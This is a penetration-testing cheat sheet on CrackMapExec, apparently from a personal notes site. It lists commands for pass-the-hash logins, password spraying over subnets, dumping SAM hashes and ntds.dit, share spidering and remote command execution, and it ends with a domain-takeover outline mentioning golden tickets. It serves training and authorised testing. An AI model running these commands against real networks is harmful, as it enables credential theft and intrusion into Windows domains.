CrackMapExec
Once we have access to a domain, CrackMapExec (CME) will allow us to sweep the network and see which users and machines we can access to.
CME allows us to authenticate ourselves with the following protocols:
- smb
- ssh
- mssql
- ldap
- winrm
The most used protocol is smb as port 445 is commonly open.
CME offers a help menu for each protocol (i.e., crackmapexec winrm -h
).
Installation
Basic usage
Main syntax
Main flags:
- -u Username
The user whose credentials we will use to authenticate
- -p Password
User's password
- Target (IP or FQDN)
Target host to enumerate
(in our case, the Domain Controller) - --users
Specifies to enumerate Domain Users
- --groups
Specifies to enumerate domain groups
- --loggedon-users
Attempts to enumerate what users are logged on to a target, if any
Access the machine
# Check if we can access a machine
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>
# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)
crackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>
Basic enumeration
# Enumerate active sessions
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions
# Obtain the password policy
crackmapexec smb $ip -u <username> -p <password> --pass-pol
# Spraying password with crackmapexec
crackmapexec smb $ip/23 -u /folder/userlist.txt -u administrator -H 88ad09182de639ccc6579eb0849751cf --local-auth --continue-on-success | grep +
# --continue-on-success: continue spraying even after a valid password is found. Useful for spraying a single password against a large user list
# --local-auth: if we are targetting a non-domain joined computer, we will need to use the option --local-auth. The --local-auth flag will tell the tool only to attempt to log in one time on each machine which removes any risk of account lockout.
# -H: hash
# Get sam: extract hashes from all users authenticated in the machine
crackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam
# Get the ntds.dit, given that your user has permissions
crackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds
# Check which machines we can access in a subnet
crackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>
# Enumerate logged on users in other hosts of the domain
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users
# Enumerate users of the domain
sudo crackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --users
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users
# Enumerate groups of the domain
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --groups
Enumerate shares
# See shares
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares
# The module spider_plus will dig through each readable share on the host and list all readable files.
sudo crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> -M spider_plus --share 'NameOfShare'
# CME writes the results to a JSON file located at /tmp/cme_spider_plus/<ip of host>
RCE with crackmapexec
# If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.
crackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec
Basic technique
Once we have access to a domain:
-
Enumerate users and machines in our machine: we will have all users registered and their hashes.
-
See if any user is in another machine of the domain. Also check if they have admin access.
-
Goal would be to dump ntds.dit.
With krbtgt and DC$ user you can get a golden ticket. And with DC$ a silver ticket.
What is a SAM hash like?
Take the Administrator one:
Basically, it has 4 parts:
user : id: LM-authentication : NTLM
For the purpose of using the hash with CrackMapExec, we will user the NTLM part.
Last update: 2024-11-17 Created: July 13, 2023 15:55:29